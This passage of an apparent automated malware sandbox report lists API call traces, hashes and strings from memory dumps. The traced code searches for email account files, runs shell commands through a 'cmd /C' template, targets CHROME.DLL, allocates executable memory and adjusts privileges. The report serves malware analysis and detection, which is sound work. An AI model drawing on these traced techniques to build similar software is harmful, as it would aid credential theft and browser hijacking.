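The fourth VirtualProtect at 001D7B52 requests protection 00000000 and is the restore step, which is why the RWX check looks at the new-protection argument rather than merely counting VirtualProtect calls; the same parser can be pointed at any other "APIs" list on this page, since sub-call bullets keep the address of the sub-function they belong to.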
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
